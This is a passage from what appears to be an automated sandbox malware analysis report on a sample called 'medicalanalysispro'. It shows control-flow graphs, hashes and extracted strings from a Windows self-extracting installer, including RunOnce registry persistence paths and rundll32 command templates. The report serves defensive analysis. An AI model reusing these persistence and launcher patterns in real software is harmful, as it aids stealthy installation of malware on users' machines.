7ff7600a46ec-7ff7600a4717 RegSetValueExA 89->92 90->99 93 7ff7600a441f-7ff7600a4427 91->93 94 7ff7600a4417-7ff7600a441b 91->94 92->72 97 7ff7600a4431-7ff7600a4433 93->97 98 7ff7600a4429-7ff7600a442d 93->98 94->93 101 7ff7600a4435-7ff7600a4439 97->101 102 7ff7600a443d-7ff7600a4445 97->102 98->97 99->19 101->102 104 7ff7600a444f-7ff7600a4451 102->104 105 7ff7600a4447-7ff7600a444b 102->105 107 7ff7600a4453-7ff7600a4457 104->107 108 7ff7600a445b-7ff7600a447e 104->108 105->104 107->108 110 7ff7600a4480-7ff7600a4491 FreeLibrary 108->110 111 7ff7600a44d3-7ff7600a44da FreeLibrary 108->111 110->76 111->59
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                                                                                                • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$ham$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 2679723528-2123044605
                                                                                                                                                                                                                                                                                                                • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                                                                                                                                                                                                                • Instruction ID: 5174b131c2288469e02a41cc2a6fd843a3e8e8e3fd0f8c91aa4ed2df668c2073
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF028075A08642D6E760AB20E8406BAB7A0FB85744FD44135DA4E43F9ADF3CF564C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A1D28 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 183registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                                                                                • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d
                                                                                                                                                                                                                                                                                                                • API String ID: 178549006-468490929
                                                                                                                                                                                                                                                                                                                • Opcode ID: 975c7f65adf0376f38f92b3e0fb3544ecbadfca005f218675da6c195c9c5ec1f
                                                                                                                                                                                                                                                                                                                • Instruction ID: f72c200850730a49682f11a9109436b32c1eea18cc65fb189f0f60ebdb153fbb
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 975c7f65adf0376f38f92b3e0fb3544ecbadfca005f218675da6c195c9c5ec1f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66816F32B08A86D6EB10AF11E8406B9F7A0FB89B54F855131DA4E07B5ADF3DE525C720
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A1684 Relevance: 37.1, APIs: 10, Strings: 11, Instructions: 350memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 144 7ff7600a1684-7ff7600a16ce 145 7ff7600a16d3-7ff7600a16dd 144->145 146 7ff7600a16df-7ff7600a16e5 145->146 147 7ff7600a16f2-7ff7600a1704 145->147 146->147 148 7ff7600a16e7-7ff7600a16f0 146->148 149 7ff7600a1713-7ff7600a171a 147->149 150 7ff7600a1706-7ff7600a1711 147->150 148->145 148->147 151 7ff7600a171e-7ff7600a173c call 7ff7600a15e8 149->151 150->151 154 7ff7600a17aa-7ff7600a17c2 151->154 155 7ff7600a173e 151->155 156 7ff7600a17c7-7ff7600a17d1 154->156 157 7ff7600a1741-7ff7600a1748 155->157 158 7ff7600a17d3-7ff7600a17d9 156->158 159 7ff7600a17e6-7ff7600a17ff call 7ff7600a7ba8 156->159 157->157 160 7ff7600a174a-7ff7600a174e 157->160 158->159 162 7ff7600a17db-7ff7600a17e4 158->162 166 7ff7600a1804-7ff7600a1814 call 7ff7600a7d68 159->166 160->154 161 7ff7600a1750-7ff7600a1757 160->161 164 7ff7600a1759-7ff7600a175c 161->164 165 7ff7600a175e-7ff7600a1760 161->165 162->156 162->159 164->165 168 7ff7600a1766-7ff7600a1776 164->168 165->154 169 7ff7600a1762-7ff7600a1764 165->169 172 7ff7600a181a-7ff7600a1847 CompareStringA 166->172 173 7ff7600a1a1b-7ff7600a1a2b call 7ff7600a7d68 166->173 171 7ff7600a177b-7ff7600a1785 168->171 169->154 169->168 174 7ff7600a1787-7ff7600a178d 171->174 175 7ff7600a179a-7ff7600a17a8 171->175 172->173 176 7ff7600a184d-7ff7600a1861 GetFileAttributesA 172->176 184 7ff7600a1a31-7ff7600a1a5e CompareStringA 173->184 185 7ff7600a1acb-7ff7600a1ae9 LocalAlloc 173->185 174->175 177 7ff7600a178f-7ff7600a1798 174->177 175->166 179 7ff7600a19f3-7ff7600a19fb 176->179 180 7ff7600a1867-7ff7600a186f 176->180 177->171 177->175 183 7ff7600a1a00-7ff7600a1a16 call 7ff7600a4dcc 179->183 180->179 182 7ff7600a1875-7ff7600a1891 call 7ff7600a15e8 180->182 198 7ff7600a1893-7ff7600a18b0 call 7ff7600a15e8 182->198 199 7ff7600a18b5-7ff7600a18d1 LocalAlloc 182->199 200 7ff7600a1bda-7ff7600a1c03 call 7ff7600a8470 183->200 184->185 190 7ff7600a1a60-7ff7600a1a67 184->190 188 7ff7600a1aa2-7ff7600a1aad 185->188 189 7ff7600a1aeb-7ff7600a1aff GetFileAttributesA 185->189 188->183 194 7ff7600a1b01-7ff7600a1b03 189->194 195 7ff7600a1b7e-7ff7600a1b88 189->195 191 7ff7600a1a6a-7ff7600a1a71 190->191 191->191 196 7ff7600a1a73 191->196 194->195 201 7ff7600a1b05-7ff7600a1b16 194->201 197 7ff7600a1b8f-7ff7600a1b99 195->197 202 7ff7600a1a78-7ff7600a1a7f 196->202 203 7ff7600a1b9b-7ff7600a1ba1 197->203 204 7ff7600a1bae-7ff7600a1bb9 197->204 198->199 199->188 206 7ff7600a18d7-7ff7600a194d GetPrivateProfileIntA GetPrivateProfileStringA 199->206 207 7ff7600a1b1d-7ff7600a1b27 201->207 202->202 210 7ff7600a1a81-7ff7600a1aa0 LocalAlloc 202->210 203->204 211 7ff7600a1ba3-7ff7600a1bac 203->211 212 7ff7600a1bbc-7ff7600a1bcc call 7ff7600a2a6c 204->212 213 7ff7600a194f-7ff7600a197f call 7ff7600a1008 * 2 206->213 214 7ff7600a1984-7ff7600a1993 206->214 215 7ff7600a1b29-7ff7600a1b2f 207->215 216 7ff7600a1b3c-7ff7600a1b4d 207->216 210->188 220 7ff7600a1ab2-7ff7600a1ac6 call 7ff7600a114c 210->220 211->197 211->204 227 7ff7600a1bd1-7ff7600a1bd5 212->227 213->227 218 7ff7600a1995-7ff7600a19b8 GetShortPathNameA 214->218 219 7ff7600a19ba 214->219 215->216 223 7ff7600a1b31-7ff7600a1b3a 215->223 216->212 217 7ff7600a1b4f-7ff7600a1b52 216->217 217->212 224 7ff7600a1b54-7ff7600a1b7c call 7ff7600a1084 * 2 217->224 225 7ff7600a19c1-7ff7600a19ee call 7ff7600a114c 218->225 219->225 220->227 223->207 223->216 224->212 225->227 227->200
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                                                                                • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                                                                                • API String ID: 383838535-1383298736
                                                                                                                                                                                                                                                                                                                • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                                                                                                                                                                                                                • Instruction ID: bd5b5783ebc7f99a7ee5c283494f0448f8f8f4db0d265b67a319d06acf6fad27
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81E18B62B19682D6EB11AF20A4402FAB7A0EB45784FD44136DA4D07F9ADF3DF569C330
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A66C4 Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 299memorystringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 238 7ff7600a66c4-7ff7600a6724 call 7ff7600a5050 LocalAlloc 241 7ff7600a6756-7ff7600a676a call 7ff7600a5050 238->241 242 7ff7600a6726-7ff7600a6749 call 7ff7600a4dcc call 7ff7600a7700 238->242 247 7ff7600a67a5-7ff7600a67ea lstrcmpA LocalFree 241->247 248 7ff7600a676c-7ff7600a67a3 call 7ff7600a4dcc LocalFree 241->248 257 7ff7600a674f-7ff7600a6751 242->257 251 7ff7600a6837-7ff7600a683d 247->251 252 7ff7600a67ec-7ff7600a67ee 247->252 248->257 258 7ff7600a6b14-7ff7600a6b38 call 7ff7600a7ac8 251->258 259 7ff7600a6843-7ff7600a6849 251->259 255 7ff7600a67f0-7ff7600a67f9 252->255 256 7ff7600a67fb 252->256 255->256 260 7ff7600a67fe-7ff7600a680e call 7ff7600a64e4 255->260 256->260 261 7ff7600a6b3a-7ff7600a6b66 call 7ff7600a8470 257->261 258->261 259->258 263 7ff7600a684f-7ff7600a6870 GetTempPathA 259->263 274 7ff7600a6b0f-7ff7600a6b12 260->274 275 7ff7600a6814-7ff7600a6832 call 7ff7600a4dcc 260->275 265 7ff7600a6872-7ff7600a687e call 7ff7600a64e4 263->265 266 7ff7600a68ad-7ff7600a68b9 263->266 273 7ff7600a6883-7ff7600a6885 265->273 272 7ff7600a68bc-7ff7600a68bf 266->272 276 7ff7600a68c4-7ff7600a68ce 272->276 273->274 277 7ff7600a688b-7ff7600a6895 call 7ff7600a2468 273->277 274->261 275->257 279 7ff7600a68d0-7ff7600a68d5 276->279 280 7ff7600a68e1-7ff7600a68f3 276->280 277->266 292 7ff7600a6897-7ff7600a68a7 call 7ff7600a64e4 277->292 279->280 283 7ff7600a68d7-7ff7600a68df 279->283 284 7ff7600a68f9-7ff7600a690f GetDriveTypeA 280->284 285 7ff7600a6adb-7ff7600a6b04 GetWindowsDirectoryA call 7ff7600a6ca4 280->285 283->276 283->280 286 7ff7600a6911-7ff7600a6914 284->286 287 7ff7600a6916-7ff7600a692a GetFileAttributesA 284->287 285->257 297 7ff7600a6b0a 285->297 286->287 290 7ff7600a6930-7ff7600a6933 286->290 287->290 291 7ff7600a69bd-7ff7600a69d0 call 7ff7600a6ca4 287->291 294 7ff7600a6935-7ff7600a693f 290->294 295 7ff7600a69ad 290->295 305 7ff7600a69d2-7ff7600a69de call 7ff7600a2468 291->305 306 7ff7600a69f4-7ff7600a6a00 call 7ff7600a2468 291->306 292->266 292->274 299 7ff7600a69b1-7ff7600a69b8 294->299 300 7ff7600a6941-7ff7600a6953 294->300 295->299 297->272 304 7ff7600a6ad2-7ff7600a6ad5 299->304 300->299 303 7ff7600a6955-7ff7600a6981 GetDiskFreeSpaceA 300->303 303->295 308 7ff7600a6983-7ff7600a69a4 MulDiv 303->308 304->284 304->285 305->295 313 7ff7600a69e0-7ff7600a69f2 call 7ff7600a6ca4 305->313 314 7ff7600a6a02-7ff7600a6a11 GetWindowsDirectoryA 306->314 315 7ff7600a6a16-7ff7600a6a3e call 7ff7600a7ba8 GetFileAttributesA 306->315 308->295 311 7ff7600a69a6-7ff7600a69ab 308->311 311->291 311->295 313->295 313->306 314->315 320 7ff7600a6a40-7ff7600a6a53 CreateDirectoryA 315->320 321 7ff7600a6a55 315->321 322 7ff7600a6a58-7ff7600a6a5a 320->322 321->322 323 7ff7600a6a5c-7ff7600a6a6b 322->323 324 7ff7600a6a6d-7ff7600a6a8e SetFileAttributesA 322->324 323->304 325 7ff7600a6a91-7ff7600a6a9b 324->325 326 7ff7600a6aaf-7ff7600a6acc call 7ff7600a64e4 325->326 327 7ff7600a6a9d-7ff7600a6aa3 325->327 326->274 331 7ff7600a6ace 326->331 327->326 328 7ff7600a6aa5-7ff7600a6aad 327->328 328->325 328->326 331->304
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                                                                                • API String ID: 3973824516-559629209
                                                                                                                                                                                                                                                                                                                • Opcode ID: dfd9198a31c2bb830314bac0c16e355497c0ad7db76eb342e63e20a133dffc7a
                                                                                                                                                                                                                                                                                                                • Instruction ID: e41b3324d1c0783cf9b0a48e7eec6435f5d8954b6d6443c88f82bb32bb76b11b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfd9198a31c2bb830314bac0c16e355497c0ad7db76eb342e63e20a133dffc7a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20D18022A18682C6EB10AB2494502BAF7B1FB95744FD44135DA4E47F9ADF3DF825CB30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A2DB4 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 179synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 332 7ff7600a2db4-7ff7600a2e4d call 7ff7600a8b09 memset * 2 call 7ff7600a5050 337 7ff7600a2e53-7ff7600a2e94 CreateEventA SetEvent call 7ff7600a5050 332->337 338 7ff7600a30a5 332->338 343 7ff7600a2ec3-7ff7600a2ecb 337->343 344 7ff7600a2e96-7ff7600a2ea0 337->344 339 7ff7600a30aa-7ff7600a30b9 call 7ff7600a4dcc 338->339 345 7ff7600a30be 339->345 348 7ff7600a2ed5-7ff7600a2ef0 call 7ff7600a5050 343->348 349 7ff7600a2ecd-7ff7600a2ecf 343->349 346 7ff7600a2ea2-7ff7600a2ebe call 7ff7600a4dcc 344->346 347 7ff7600a30c0-7ff7600a30e3 call 7ff7600a8470 345->347 346->345 359 7ff7600a2ef2-7ff7600a2efc 348->359 360 7ff7600a2efe-7ff7600a2f1c CreateMutexA 348->360 349->348 352 7ff7600a2fa3-7ff7600a2fb3 call 7ff7600a70a8 349->352 361 7ff7600a2fc4-7ff7600a2fcb 352->361 362 7ff7600a2fb5-7ff7600a2fbf 352->362 359->346 360->352 363 7ff7600a2f22-7ff7600a2f33 GetLastError 360->363 364 7ff7600a2fde-7ff7600a2ffd FindResourceExA 361->364 365 7ff7600a2fcd-7ff7600a2fd9 call 7ff7600a204c 361->365 362->339 363->352 366 7ff7600a2f35-7ff7600a2f48 363->366 368 7ff7600a2fff-7ff7600a3011 LoadResource 364->368 369 7ff7600a3014-7ff7600a301b 364->369 365->345 370 7ff7600a2f62-7ff7600a2f7f call 7ff7600a4dcc 366->370 371 7ff7600a2f4a-7ff7600a2f60 call 7ff7600a4dcc 366->371 368->369 375 7ff7600a3029-7ff7600a3030 369->375 376 7ff7600a301d-7ff7600a3024 #17 369->376 370->352 381 7ff7600a2f81-7ff7600a2f9e CloseHandle 370->381 371->381 377 7ff7600a3032-7ff7600a3035 375->377 378 7ff7600a303a-7ff7600a3044 call 7ff7600a3bf4 375->378 376->375 377->347 378->345 384 7ff7600a3046-7ff7600a3055 378->384 381->345 384->377 385 7ff7600a3057-7ff7600a3061 384->385 385->377 386 7ff7600a3063-7ff7600a306a 385->386 386->377 387 7ff7600a306c-7ff7600a3073 call 7ff7600a12ec 386->387 387->377 390 7ff7600a3075-7ff7600a30a1 call 7ff7600a7ac8 387->390 390->345 393 7ff7600a30a3 390->393 393->377
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$ham
                                                                                                                                                                                                                                                                                                                • API String ID: 3100096412-71271436
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1532ac87bb8192897821c307cb4a22cbe5c8daa00dad0a86dcb8e4bbb22e7f50
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fc7f578be530f482524e13d1538833715e790512501b6b919f004c900bcfea5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9815A61A08642C6F720BB25A810BB9F6A0EF99784FC44135D94E46F9BDF7CB465CB30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A6CA4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 394 7ff7600a6ca4-7ff7600a6d10 GetCurrentDirectoryA SetCurrentDirectoryA 395 7ff7600a6d3f-7ff7600a6d7a GetDiskFreeSpaceA 394->395 396 7ff7600a6d12-7ff7600a6d3a call 7ff7600a4dcc call 7ff7600a7700 394->396 398 7ff7600a6d80-7ff7600a6da8 MulDiv 395->398 399 7ff7600a6f63-7ff7600a6fb8 memset call 7ff7600a7700 GetLastError FormatMessageA 395->399 414 7ff7600a6fe9 396->414 398->399 402 7ff7600a6dae-7ff7600a6de4 GetVolumeInformationA 398->402 410 7ff7600a6fbd-7ff7600a6fe4 call 7ff7600a4dcc SetCurrentDirectoryA 399->410 405 7ff7600a6de6-7ff7600a6e40 memset call 7ff7600a7700 GetLastError FormatMessageA 402->405 406 7ff7600a6e45-7ff7600a6e68 SetCurrentDirectoryA 402->406 405->410 408 7ff7600a6e6c-7ff7600a6e73 406->408 412 7ff7600a6e86-7ff7600a6e99 408->412 413 7ff7600a6e75-7ff7600a6e7a 408->413 410->414 419 7ff7600a6e9d-7ff7600a6ea0 412->419 413->412 418 7ff7600a6e7c-7ff7600a6e84 413->418 417 7ff7600a6feb-7ff7600a701a call 7ff7600a8470 414->417 418->408 418->412 421 7ff7600a6ea2-7ff7600a6eac 419->421 422 7ff7600a6eae-7ff7600a6eb2 419->422 421->419 421->422 424 7ff7600a6eb4-7ff7600a6ed3 call 7ff7600a4dcc 422->424 425 7ff7600a6ed8-7ff7600a6edf 422->425 424->414 427 7ff7600a6ee1-7ff7600a6ee9 425->427 428 7ff7600a6f0e-7ff7600a6f1f 425->428 427->428 431 7ff7600a6eeb-7ff7600a6f0c 427->431 429 7ff7600a6f22-7ff7600a6f2a 428->429 432 7ff7600a6f46-7ff7600a6f49 429->432 433 7ff7600a6f2c-7ff7600a6f30 429->433 431->429 435 7ff7600a6f4f-7ff7600a6f52 432->435 436 7ff7600a6f4b-7ff7600a6f4d 432->436 434 7ff7600a6f32 433->434 437 7ff7600a6f54-7ff7600a6f5e 434->437 438 7ff7600a6f34-7ff7600a6f41 call 7ff7600a24f8 434->438 435->434 436->434 437->417 438->417
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                                                                                                • API String ID: 4237285672-1193786559
                                                                                                                                                                                                                                                                                                                • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 603775c11ab0fa6a923bc815490c50118c72e5e00e5e891e339dab48a4e7d787
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43A16036A18641CAE720AF24E4406BAFBA1FB89744F844135DA4E43F59DF3DE465CB20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A5D90 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 124windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
